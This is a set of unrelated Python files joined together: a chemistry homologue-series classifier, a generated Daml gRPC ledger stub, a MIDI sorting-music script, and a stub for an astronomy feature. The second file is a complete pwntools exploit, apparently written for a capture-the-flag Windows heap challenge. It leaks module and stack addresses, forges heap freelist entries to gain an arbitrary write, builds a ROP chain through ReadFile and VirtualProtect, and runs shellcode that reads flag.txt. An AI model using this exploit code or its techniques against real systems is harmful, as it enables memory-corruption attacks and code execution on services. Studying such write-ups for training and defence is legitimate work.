frag_steps = args.frag_in if args.frag_in is not None else 2  # fragmentation steps
print("all args parsed OK")
# Main classification pipeline. NOTE(review): all helpers below come from
# the star import of `utils`; their contracts are inferred from names and
# the progress prints — confirm against utils.py.
# read in SMILES and labels
(
    smiles,
    mols,
    smiles_torem,
    idxtorem,
    labels,
    input_df,
    df,
    path_to_csv,
) = read_input_csv_smiles_name(args.input_csv, args.separator, smiles, names)
print("inputs parsed OK")
# enumerate repeating units
ru = setup_repeating_unit(ru_in, min_length, max_length)
print("ru setup OK")
# prepare output dir
Path("output").mkdir(parents=True, exist_ok=True)
print("output folder setup OK")
# remove unparseable SMILES, write to .txt
write_removed_smiles(smiles_torem)
# detect RUs in mols
(
    mols_no_ru_matches,
    labels_mols_no_ru_matches,
    mols_with_ru,
    labels_mols_with_ru,
) = detect_repeating_units(mols, labels, ru)
print("detect_repeating_units OK")
# fragmentation into patts and cores, done n times (n = frag_steps)
lists_patts, lists_cores, empty_cores_idx = fragment_into_cores(
    mols_with_ru, ru, frag_steps
)
print("Done fragment_into_cores")
# detect and output molecules made solely of RUs
(
    mols_made_of_ru,
    labels_made_of_ru,
    mols_to_classify,
    labels_to_classify,
) = detect_mols_made_of_ru(mols_with_ru, labels_mols_with_ru, empty_cores_idx)
print("Done detect_mols_made_of_ru")
# remove mols with empty core objects
lists_patts, lists_cores = process_patts_cores(
    lists_patts, lists_cores, empty_cores_idx
)
print("Done filtering out empty patts and cores")
# generate summary df
classified_series, result_df = generate_df(
    lists_patts, lists_cores, mols_to_classify, labels_to_classify, df, mols_made_of_ru
)
print("Done generate_df")
# detect mols with unique cores i.e. don't form series
mols_nonseries, labs_nonseries, nonseries = detect_mols_nonseries(result_df)
print("Done detect_mols_nonseries")
# group molecules into series by unique canonical SMILES of cores
grpdmols = detect_cores_classified_series(classified_series)
print("Done detect_cores_classified_series")
# depict cores and legends
final_cores, leg_final_cores = depict_cores_summary(grpdmols)
print("Done depict_cores_summary")
# generate output CSV with series_no, calculated mf, inchis, inchikeys etc.
generate_classified_series_summary(result_df)
print("Done generate_classified_series_summary")
# generate output summary
num_series, mols_classified = print_output_summary(
    result_df, nonseries, mols_no_ru_matches, mols_made_of_ru
)
end = time()
print(
    "Homologue classification complete! "
    + str(mols_classified)
    + " molecules have been classified into "
    + str(num_series)
    + " series."
)
runtime = end - start
print("It took " + str(runtime) + " seconds.")
# output summary file
generate_output_summary(
    mols_classified,
    num_series,
    ru_in,
    mols_no_ru_matches,
    nonseries,
    mols_made_of_ru,
    min_length,
    max_length,
    frag_steps,
    runtime,
    path_to_csv,
)
print("Classification summary generated.")
|
from pwn import *
import time
import sys
def add(key, size, data):
    """Menu option 1: store `data` under `key` with an allocation of `size` bytes."""
    proc.sendlineafter(b'>>', b'1')
    proc.sendlineafter(b':', key)
    proc.sendlineafter(b':', f'{size}'.encode())
    proc.sendafter(b':', data)
def view(key):
    """Menu option 2: request `key`; leaves the stream positioned after 'Data:'."""
    proc.sendlineafter(b'>>', b'2')
    proc.sendlineafter(b':', key)
    proc.recvuntil(b'Data:')
def remove(key):
    """Menu option 3: free the entry stored under `key`."""
    proc.sendlineafter(b'>>', b'3')
    proc.sendlineafter(b':', key)
def logout():
    """Menu option 4: log the current user out."""
    proc.sendlineafter(b'>>', b'4')
def login(name, password):
    """Authenticate with raw `name`/`password` bytes (caller supplies newlines)."""
    # login
    proc.sendlineafter(b'>>', b'1')
    proc.sendafter(b':', name)
    proc.sendafter(b':', password)
def exploit():
    """Windows heap exploit: leak addresses via an overflowed node, forge
    user/password list entries for an arbitrary-write primitive, then ROP
    into ReadFile/VirtualProtect and run flag-printing shellcode.

    NOTE(review): every hard-coded offset below is specific to the target's
    ntdll/kernel32/program builds — verify against those binaries.
    """
    if len(sys.argv) <= 1:
        input('attach to pid: {}'.format(proc.proc.pid))
    login(b'ddaa\n', b'phdphd\n')
    # Warm up the Low Fragmentation Heap bucket with same-size allocations.
    for i in range(19):
        add(f'LFH_{i}', 0x200, 'LFH')
    for i in range(0x10):
        add(f'fill_{i}', 0x200, 'LFH')
    remove('fill_0')
    add('fill_1', 0x60, 'AAAA')
    view('fill_1')
    # data + chunk header
    proc.recv(0x60 + 0x10)
    heap_base = u64(proc.recv(8)) & ~0xffff  # round leaked pointer down to heap base
    size = u64(proc.recv(8))
    next_node = proc.recvuntil(b'\x00')[:-1]
    log.info('heap: ' + hex(heap_base))
    lock = heap_base + 0x2c0

    def leak(addr):
        # Arbitrary 8-byte read: overflow fill_1 so the adjacent node's data
        # pointer becomes `addr`, then view that node.
        add(b'fill_1', 0x60, b'A' * 0x70 + p64(addr))
        view(next_node)
        return u64(proc.recv(8))

    # Walk known pointer chains to recover module bases.
    ntdll = leak(lock) - 0x163d10
    log.info('ntdll: ' + hex(ntdll))
    # 00000000`00163d10
    program = leak(ntdll + 0x01652c8) - 0xf8
    log.info('program: ' + hex(program))
    peb = leak(ntdll + 0x1652e8) - 0x240
    log.info('peb: ' + hex(peb))
    stack = leak(peb + 0x1010)
    log.info('stack: ' + hex(stack))
    kernel32 = leak(program + 0x3000) - 0x22680
    log.info('kernel32: ' + hex(kernel32))
    process_parameter = leak(peb + 0x20)
    stdin = leak(process_parameter + 0x20)
    log.info('stdin:' + hex(stdin))
    stdout = leak(process_parameter + 0x28)
    log.info('stdout:' + hex(stdout))
    target = program + 0x1e38
    ret_addr = stack + 0x2000 + (0x100 * 8)
    found = False
    # Scan the stack for the saved return address back into the program.
    for i in range(0x1000 // 8):
        print(i, hex(ret_addr))
        if leak(ret_addr) == target:
            print('Found return address')
            found = True
            break
        ret_addr += 8
    assert found
    ret_addr -= 0x280
    # Lay out neighbouring nodes, then free B and D to expose their
    # freelist flink/blink pointers through A's overread.
    add(b'A', 0x440, b'AAAA' * 8)
    add(b'A', 0x100, b'AAAA' * 8)
    add(b'B', 0x100, b'BBBB' * 8)
    add(b'C', 0x100, b'CCCC' * 8)
    add(b'D', 0x100, b'DDDD' * 8)
    remove(b'B')
    remove(b'D')
    view(b'A')
    proc.recv(0x100)
    fake_chunk_header = proc.recv(0x10)
    B_flink = u64(proc.recv(8))
    B_blink = u64(proc.recv(8))
    proc.recv(0x100 + 0x110)
    D_flink = u64(proc.recv(8))
    D_blink = u64(proc.recv(8))
    print(hex(B_flink), hex(B_blink))
    print(hex(D_flink), hex(D_blink))
    B_addr = D_blink
    pass_adr = program + 0x5648
    user_adr = program + 0x5620
    add(b'A', 0x100, b'A' * 0x100 + fake_chunk_header + p64(pass_adr + 0x10))
    logout()
    # B->fake2(pass)->fake1(user)
    fake2 = b'phdphd\x00'.ljust(8, b'\x00') + fake_chunk_header[8:]
    fake2 += p64(user_adr + 0x10) + p64(D_blink)
    fake1 = b'ddaa\x00'.ljust(8, b'\x00') + fake_chunk_header[8:]
    fake1 += p64(D_flink) + p64(pass_adr + 0x10)
    login(fake1, fake2)
    cnt = 0
    _ptr = 0
    _base = ret_addr  # buffer base points at the saved return address
    flag = 0x2080
    fd = 0
    bufsize = 0x100+0x10
    # Forge a FILE-like structure so subsequent writes land on the stack.
    obj = p64(_ptr) + p64(_base) + p32(cnt) + p32(flag)
    obj += p32(fd) + p32(0) + p64(bufsize) +p64(0)
    obj += p64(0xffffffffffffffff) + p32(0xffffffff) + p32(0) + p64(0)*2
    add(b'BBBB', 0x100, obj)
    add(b'BSS', 0x100, b'S' * 0x10 + p64(B_addr))
    logout()
    input('a')
    login(b'aaaa', b'aaaa')
    pop_rdx_rcx_r8_r9_r10_r11 = ntdll + 0x8fb30
    shellcode_addr = program + 0x5000
    readfile = kernel32 + 0x22680
    virtualprotect = kernel32 + 0x1b680
    # ROP chain: ReadFile(stdin, shellcode_addr, 0x100) then
    # VirtualProtect(shellcode_addr, 0x1000, PAGE_EXECUTE_READWRITE) and jump.
    buf = flat(pop_rdx_rcx_r8_r9_r10_r11, shellcode_addr)
    buf += flat(stdin, 0x100, shellcode_addr + 0x100, 10, 11, readfile)
    buf += flat(pop_rdx_rcx_r8_r9_r10_r11, 0x1000, shellcode_addr)
    buf += flat(0x40, ret_addr + 0x100 - 8, 0, 11)
    buf += flat(virtualprotect, shellcode_addr)
    proc.send(buf.ljust(0x100 - 8) + p64(0x4))
    writefile = kernel32 + 0x22770
    createfile = kernel32 + 0x222f0
    # Shellcode: CreateFile("flag.txt") -> ReadFile -> WriteFile(stdout).
    shellcode = f'''
    jmp readflag
flag:
    pop r11
createfile:
    mov qword ptr [rsp + 0x30], 0
    mov qword ptr [rsp + 0x28], 0x80
    mov qword ptr [rsp + 0x20], 3
    xor r9, r9
    mov r8, 1
    mov rdx, 0x80000000
    mov rcx, r11
    mov rax, {createfile}
    call rax
readfile:
    mov qword ptr [rsp + 0x20], 0
    lea r9, [rsp + 0x200]
    mov r8, 0x100
    lea rdx, [rsp + 0x100]
    mov rcx, rax
    mov rax, {readfile}
    call rax
writefile:
    mov qword ptr [rsp + 0x20], 0
    lea r9, [rsp + 0x200]
    mov r8, 0x100
    lea rdx, [rsp + 0x100]
    mov rcx, {stdout}
    mov rax, {writefile}
    call rax
loop:
    jmp loop
readflag:
    call flag
'''
    shellcode = (asm(shellcode) + b'flag.txt\x00').ljust(0x100, b'\x90')
    proc.send(shellcode)
if __name__ == '__main__':
    context.arch = 'amd64'
    connect = 'nc 192.168.9.1 4869'
    connect = connect.split(' ')
    # Any CLI argument selects the remote target; otherwise run locally.
    if len(sys.argv) > 1:
        proc = remote(connect[1], int(connect[2]))
    else:
        proc = process(['filename'], env={'LD_LIBRARY_PATH': './'})
    exploit()
    proc.interactive()
|
# Copyright (c) 2017-2023 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
# fmt: off
# isort: skip_file
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from . import transaction_service_pb2 as com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2
class TransactionServiceStub(object):
    """Allows clients to read transactions from the ledger.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        # Server-streaming endpoints (continuous transaction feeds).
        self.GetTransactions = channel.unary_stream(
                '/com.daml.ledger.api.v1.TransactionService/GetTransactions',
                request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsRequest.SerializeToString,
                response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsResponse.FromString,
                )
        self.GetTransactionTrees = channel.unary_stream(
                '/com.daml.ledger.api.v1.TransactionService/GetTransactionTrees',
                request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsRequest.SerializeToString,
                response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionTreesResponse.FromString,
                )
        # Unary point-lookup and offset endpoints.
        self.GetTransactionByEventId = channel.unary_unary(
                '/com.daml.ledger.api.v1.TransactionService/GetTransactionByEventId',
                request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByEventIdRequest.SerializeToString,
                response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionResponse.FromString,
                )
        self.GetTransactionById = channel.unary_unary(
                '/com.daml.ledger.api.v1.TransactionService/GetTransactionById',
                request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByIdRequest.SerializeToString,
                response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionResponse.FromString,
                )
        self.GetFlatTransactionByEventId = channel.unary_unary(
                '/com.daml.ledger.api.v1.TransactionService/GetFlatTransactionByEventId',
                request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByEventIdRequest.SerializeToString,
                response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetFlatTransactionResponse.FromString,
                )
        self.GetFlatTransactionById = channel.unary_unary(
                '/com.daml.ledger.api.v1.TransactionService/GetFlatTransactionById',
                request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByIdRequest.SerializeToString,
                response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetFlatTransactionResponse.FromString,
                )
        self.GetLedgerEnd = channel.unary_unary(
                '/com.daml.ledger.api.v1.TransactionService/GetLedgerEnd',
                request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLedgerEndRequest.SerializeToString,
                response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLedgerEndResponse.FromString,
                )
        self.GetLatestPrunedOffsets = channel.unary_unary(
                '/com.daml.ledger.api.v1.TransactionService/GetLatestPrunedOffsets',
                request_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLatestPrunedOffsetsRequest.SerializeToString,
                response_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLatestPrunedOffsetsResponse.FromString,
                )
class TransactionServiceServicer(object):
    """Allows clients to read transactions from the ledger.
    """
    # Generated base class: every handler replies UNIMPLEMENTED until a
    # concrete servicer overrides it.

    def GetTransactions(self, request, context):
        """Read the ledger's filtered transaction stream for a set of parties.
        Lists only creates and archives, but not other events.
        Omits all events on transient contracts, i.e., contracts that were both created and archived in the same transaction.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetTransactionTrees(self, request, context):
        """Read the ledger's complete transaction tree stream for a set of parties.
        The stream can be filtered only by parties, but not templates (template filter must be empty).
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetTransactionByEventId(self, request, context):
        """Lookup a transaction tree by the ID of an event that appears within it.
        For looking up a transaction instead of a transaction tree, please see GetFlatTransactionByEventId
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetTransactionById(self, request, context):
        """Lookup a transaction tree by its ID.
        For looking up a transaction instead of a transaction tree, please see GetFlatTransactionById
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetFlatTransactionByEventId(self, request, context):
        """Lookup a transaction by the ID of an event that appears within it.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetFlatTransactionById(self, request, context):
        """Lookup a transaction by its ID.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetLedgerEnd(self, request, context):
        """Get the current ledger end.
        Subscriptions started with the returned offset will serve transactions created after this RPC was called.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetLatestPrunedOffsets(self, request, context):
        """Get the latest successfully pruned ledger offsets
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_TransactionServiceServicer_to_server(servicer, server):
    """Register `servicer`'s TransactionService handlers on a grpc.Server."""
    rpc_method_handlers = {
            'GetTransactions': grpc.unary_stream_rpc_method_handler(
                    servicer.GetTransactions,
                    request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsRequest.FromString,
                    response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsResponse.SerializeToString,
            ),
            'GetTransactionTrees': grpc.unary_stream_rpc_method_handler(
                    servicer.GetTransactionTrees,
                    request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsRequest.FromString,
                    response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionTreesResponse.SerializeToString,
            ),
            'GetTransactionByEventId': grpc.unary_unary_rpc_method_handler(
                    servicer.GetTransactionByEventId,
                    request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByEventIdRequest.FromString,
                    response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionResponse.SerializeToString,
            ),
            'GetTransactionById': grpc.unary_unary_rpc_method_handler(
                    servicer.GetTransactionById,
                    request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByIdRequest.FromString,
                    response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionResponse.SerializeToString,
            ),
            'GetFlatTransactionByEventId': grpc.unary_unary_rpc_method_handler(
                    servicer.GetFlatTransactionByEventId,
                    request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByEventIdRequest.FromString,
                    response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetFlatTransactionResponse.SerializeToString,
            ),
            'GetFlatTransactionById': grpc.unary_unary_rpc_method_handler(
                    servicer.GetFlatTransactionById,
                    request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByIdRequest.FromString,
                    response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetFlatTransactionResponse.SerializeToString,
            ),
            'GetLedgerEnd': grpc.unary_unary_rpc_method_handler(
                    servicer.GetLedgerEnd,
                    request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLedgerEndRequest.FromString,
                    response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLedgerEndResponse.SerializeToString,
            ),
            'GetLatestPrunedOffsets': grpc.unary_unary_rpc_method_handler(
                    servicer.GetLatestPrunedOffsets,
                    request_deserializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLatestPrunedOffsetsRequest.FromString,
                    response_serializer=com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLatestPrunedOffsetsResponse.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'com.daml.ledger.api.v1.TransactionService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class TransactionService(object):
    """Allows clients to read transactions from the ledger.
    """
    # NOTE: auto-generated gRPC stubs (grpcio-tools, experimental one-shot
    # API).  Regenerate from the .proto rather than editing by hand.

    # Server-streaming RPC: yields GetTransactionsResponse messages.
    @staticmethod
    def GetTransactions(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_stream(request, target, '/com.daml.ledger.api.v1.TransactionService/GetTransactions',
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsRequest.SerializeToString,
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    # Server-streaming RPC; note it reuses GetTransactionsRequest as its
    # request type (per the service definition) but streams tree responses.
    @staticmethod
    def GetTransactionTrees(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_stream(request, target, '/com.daml.ledger.api.v1.TransactionService/GetTransactionTrees',
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionsRequest.SerializeToString,
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionTreesResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    # Unary RPC: look up a transaction tree by one of its event ids.
    @staticmethod
    def GetTransactionByEventId(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/com.daml.ledger.api.v1.TransactionService/GetTransactionByEventId',
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByEventIdRequest.SerializeToString,
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    # Unary RPC: look up a transaction tree by transaction id.
    @staticmethod
    def GetTransactionById(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/com.daml.ledger.api.v1.TransactionService/GetTransactionById',
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByIdRequest.SerializeToString,
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    # Unary RPC: flat-transaction variant of the event-id lookup.
    @staticmethod
    def GetFlatTransactionByEventId(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/com.daml.ledger.api.v1.TransactionService/GetFlatTransactionByEventId',
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByEventIdRequest.SerializeToString,
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetFlatTransactionResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    # Unary RPC: flat-transaction variant of the transaction-id lookup.
    @staticmethod
    def GetFlatTransactionById(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/com.daml.ledger.api.v1.TransactionService/GetFlatTransactionById',
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetTransactionByIdRequest.SerializeToString,
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetFlatTransactionResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    # Unary RPC: current ledger end offset.
    @staticmethod
    def GetLedgerEnd(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/com.daml.ledger.api.v1.TransactionService/GetLedgerEnd',
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLedgerEndRequest.SerializeToString,
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLedgerEndResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    # Unary RPC: latest offsets up to which the ledger has been pruned.
    @staticmethod
    def GetLatestPrunedOffsets(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/com.daml.ledger.api.v1.TransactionService/GetLatestPrunedOffsets',
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLatestPrunedOffsetsRequest.SerializeToString,
            com_dot_daml_dot_ledger_dot_api_dot_v1_dot_transaction__service__pb2.GetLatestPrunedOffsetsResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
|
import random
from midiutil import MIDIFile
def duration():
    """Return a random note duration between 5.0 and 30.0 beats."""
    return random.uniform(5.0, 30.0)
def pause():
    """Return a random gap between notes: 0.2-0.9 beats, in 0.1 steps."""
    hundredths = random.randrange(20, 100, 10)
    return hundredths / 100.0
def volume():
    """Return a random MIDI velocity in the range [60, 99]."""
    return random.randrange(60, 100, 1)
def insertionSort(notes, time):
    """Play the unsorted notes, insertion-sort them in place, then play the
    sorted result (uses the module-level MyMIDI/track/channel globals)."""
    for pitch in notes:
        MyMIDI.addNote(track, channel, pitch, time, duration(), volume())
        time += pause()
    for index in range(1, len(notes)):
        current = notes[index]
        slot = index
        # shift larger values right until the insertion point is found
        while slot > 0 and notes[slot - 1] > current:
            notes[slot] = notes[slot - 1]
            slot -= 1
        notes[slot] = current
    for pitch in notes:
        MyMIDI.addNote(track, channel, pitch, time, duration(), volume())
        time += pause()
def selectionSort(notes, time):
    """Play the unsorted notes, selection-sort them in place, then play the
    sorted result (uses the module-level MyMIDI/track/channel globals)."""
    for pitch in notes:
        MyMIDI.addNote(track, channel, pitch, time, duration(), volume())
        time += pause()
    for fillslot in range(len(notes) - 1, 0, -1):
        largest = 0
        for location in range(1, fillslot + 1):
            if notes[location] > notes[largest]:
                largest = location
        notes[fillslot], notes[largest] = notes[largest], notes[fillslot]
    for pitch in notes:
        MyMIDI.addNote(track, channel, pitch, time, duration(), volume())
        time += pause()
def bubbleSort(notes, time):
    """Play the unsorted notes, bubble-sort them in place, then play the
    sorted result.

    Fix: insertionSort and selectionSort both replay the list after sorting;
    this function previously stopped after sorting, so the sorted melody was
    never added to the MIDI file.  The final playback loop is added for
    consistency.
    """
    for pitch in notes:
        MyMIDI.addNote(track, channel, pitch, time, duration(), volume())
        time += pause()
    for passnum in range(len(notes) - 1, 0, -1):
        for i in range(passnum):
            if notes[i] > notes[i + 1]:
                notes[i], notes[i + 1] = notes[i + 1], notes[i]
    for pitch in notes:
        MyMIDI.addNote(track, channel, pitch, time, duration(), volume())
        time += pause()
# Interval patterns (semitone steps) for 46 named scales.
# NOTE(review): this table is defined but never referenced in the script —
# presumably intended for picking note_set from a scale; confirm before removal.
scales=[[2,2,1,2,2,2,1], #00-Major
        [2,1,2,2,1,2,2], #01-Natural Minor
        [2,1,2,2,2,2,1], #02-Melodic Minor
        [2,1,2,2,1,3,1], #03-Harmonic Minor
        [3,2,1,1,3,2], #04-Minor Pentatonic
        [2,1,1,3,2,3], #05-Major Blues
        [2,2,1,2,1,1,2,1], #06-Major Bebop
        [2,1,1,1,2,2,1,2], #07-Minor Bebop
        [1,2,1,2,2,2,2], #08-Super Locrian
        [2,1,1,2,1,1,1,2,1], #09-Nine Tone
        [2,1,2,2,2,1,2], #10-Dorian
        [1,2,2,2,1,2,2], #11-Phrygian
        [2,2,2,1,2,2,1], #12-Lydian
        [2,2,1,2,2,1,2], #13-Mixolydian
        [2,1,2,2,1,2,2], #14-Aeolian
        [1,2,2,1,2,2,2], #15-Locrian
        [3,2,2,3,2], #16-Pentatonic Minor
        [2,2,3,2,3], #17-Pentatonic Major
        [2,1,2,1,1,1,3,1], #18-Algerian
        [2,2,1,1,2,2,2], #19-Arabic
        [3,1,3,1,3,1], #20-Augmented
        [1,2,4,1,4], #21-Balinese
        [1,3,1,2,1,3,1], #22-Byzantine
        [4,2,1,4,1], #23-Chinese
        [2,1,2,1,2,1,2,1], #24-Diminished
        [1,2,1,2,1,2,1,2], #25-Dominant Diminished
        [2,3,2,3,2], #26-Egyptian
        [1,2,1,1,1,2,2,2], #27-Eight Tone Spanish
        [1,3,2,2,2,1,1], #28-Enigmatic Major
        [1,2,3,1,3,1,1], #29-Enigmatic Minor
        [2,1,2,2,1,2,2], #30-Geez
        [2,2,1,2,1,2,2], #31-Aeolian Dominant
        [1,4,1,4,2], #32-Hirajoshi
        [2,1,3,1,1,3,1], #33-Hungarian Minor (Gypsy)
        [3,1,2,1,2,1,2], #34-Hungarian Major
        [1,4,2,3,2], #35-Japanese
        [2,2,2,1,2,1,2], #36-Lydian Dominant
        [1,2,2,2,1,3,1], #37-Neapolitan Minor
        [1,2,2,2,2,2,1], #38-Neapolitan Major
        [1,2,1,2,1,2,1,2], #39-Octatonic (Half Whole)
        [2,1,2,1,2,1,2,1], #40-Octatonic (Whole Half)
        [1,3,1,1,3,1,2], #41-Oriental
        [2,2,2,2,2,2], #42-Whole Tone
        [2,1,3,1,2,1,2], #43-Romanian Minor
        [1,3,1,2,1,2,2], #44-Spanish Gypsy (Phrygian Dominant)
        [2,3,2,2,3]] #45-Yo
# Song setup: single track, channel 0, starting at beat 0, 120 BPM.
track = 0
channel = 0
time = 0
tempo = 120
MyMIDI = MIDIFile(1)
MyMIDI.addTempo(track, time, tempo)
# Candidate pitches (MIDI note numbers) the random melody is drawn from.
note_set=[39,41,44,46,48,51,53,56,58,63]
notes=[]
for i in range(0,50):
    notes.append(random.choice(note_set))
# Pick exactly one sorting "performance"; each plays the list before and
# after sorting it in place.
#insertionSort(notes,time)
selectionSort(notes, time)
#bubbleSort(notes,time)
with open("NoteSort.mid", "wb") as output_file:
    MyMIDI.writeFile(output_file)
|
from ..FeatureExtractor import ContextFeatureExtractor
import ned
class distance_in_kpc_to_nearest_galaxy(ContextFeatureExtractor):
